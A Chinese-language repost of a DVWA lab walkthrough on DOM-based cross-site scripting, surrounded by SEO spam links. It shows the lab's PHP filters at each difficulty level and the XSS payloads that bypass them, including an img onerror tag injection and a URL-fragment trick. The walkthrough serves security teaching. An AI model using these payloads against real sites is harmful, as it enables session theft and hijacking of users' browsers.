当前位置: 首页 > news >正文

开店加盟代理seo工程师

开店加盟代理,seo工程师,网络工程师面试题,免费网站建设视频DVWA DOM Based Cross Site Scripting (DOM型 XSS) 文章目录 DVWA DOM Based Cross Site Scripting (DOM型 XSS)XSS跨站原理DOM型 LowMediumHighImpossible XSS跨站原理 当应用程序发送给浏览器的页面中包含用户提交的数据,但没有经过适当验证或转义时,就…

DVWA DOM Based Cross Site Scripting (DOM型 XSS)

文章目录

  • DVWA DOM Based Cross Site Scripting (DOM型 XSS)
    • XSS跨站原理
      • DOM型
    • Low
    • Medium
    • High
    • Impossible

XSS跨站原理

当应用程序发送给浏览器的页面中包含用户提交的数据,但没有经过适当验证或转义时,就会导致跨站脚本漏洞。这个“跨”实际上属于浏览器的特性,而不是缺陷;

浏览器同源策略:只有发布Cookie的网站才能读取Cookie。

会造成Cookie窃取、劫持用户Web行为、结合CSRF进行针对性攻击等危害

DOM型

基于文档对象模型(Document Object Model)的一种漏洞;

DOM型与反射型类似,都需要攻击者诱使用户点击专门设计的URL;

Dom型 xss 是通过 url 传入参数去控制触发的;

Dom型返回页面源码中看不到输入的payload, 而是保存在浏览器的DOM中。

Low

1、分析网页源代码

<?php# No protections, anything goes?>
//没有任何防御措施

image-20240425141612735

2、修改default,在URL拼接Payload

<script>alert(/XSS/)</script>

image-20240425141658717

Medium

1、分析网页源代码

<?php// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {$default = $_GET['default'];# Do not allow script tagsif (stripos ($default, "<script") !== false) {header ("location: ?default=English");exit;}
}?>

增加对"<script"字符的过滤,查看前端代码

image-20240425143147799

2、构造闭合"option"和"select"标签,执行弹出"/xss/"的语句

</optin></select><img src = 1 onerror = alert(/xss/)>

image-20240616160139823

image-20240616161058852

High

1、分析网页源代码

<?php// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {# White list the allowable languagesswitch ($_GET['default']) {case "French":case "English":case "German":case "Spanish":# okbreak;default:header ("location: ?default=English");exit;}
}?>

2、在注入的 payload 中加入注释符 “#”,注释后边的内容不会发送到服务端,但是会被前端代码所执行。

(空格)#<script>alert(/xss/)</script>

image-20240616161314789

image-20240616161408461

Impossible

<?php# Don't need to do anything, protction handled on the client side?>
# 大多数情况下浏览器都会对 URL 中的内容进行编码,这会阻止任何注入的 JavaScript 被执行。
http://www.tj-hxxt.cn/news/80512.html

相关文章:

  • 1简述网站建设流程图申请网站怎样申请
  • 网站链接安全检测免费的网站推广软件
  • 网站建设公司发展深圳华强北新闻最新消息今天
  • 电脑网页游戏平台旺道网站优化
  • 商贸公司名字推荐seo基础优化包括哪些内容
  • 用户冻结wordpress广东seo网站设计
  • 做仓单的网站正规手游代理平台有哪些
  • 小型企业网站开发现状卡点视频免费制作软件
  • 浙江网站建设企业新闻头条今天最新消息
  • 明星个人网站设计模板网络营销的概念与含义
  • 个人网站怎么做推广seo软件优化工具软件
  • 漳州北京网站建设公司哪家好王通seo赚钱培训
  • 网页游戏单机游戏搜索引擎优化seo是什么
  • 网站设计O2O平台优化seo排名赚挂机赚钱软件下载
  • 网站后缀有什么区别为什么不能去外包公司
  • asp.net网站开发pdf网站统计哪个好用
  • 网站建设中模版常用的网络推广方法有
  • 外贸网站建设哪家有名网站点击量 哪里查询
  • 赤峰做网站哪家好关键词优化公司排名
  • 怎么做网站里插入背景音乐seo广告
  • 阜阳专业网站建设搜索引擎网站排名优化方案
  • 制作视频软件哪个好seo服务如何收费
  • wordpress 文字排版西安排名seo公司
  • 用php做网站用什么软件百度指数官网查询入口
  • 深圳做网站 汉狮网络淘宝代运营
  • 一级a做爰片免费观网站看无码短视频关键词seo优化
  • 企业做网站分一般为哪几种类型淘宝关键词排名优化技巧
  • 大连网站推广排名seo课程
  • 在网上找做设计是什么网站电商运营
  • 北京好的设计公司上海seo服务外包公司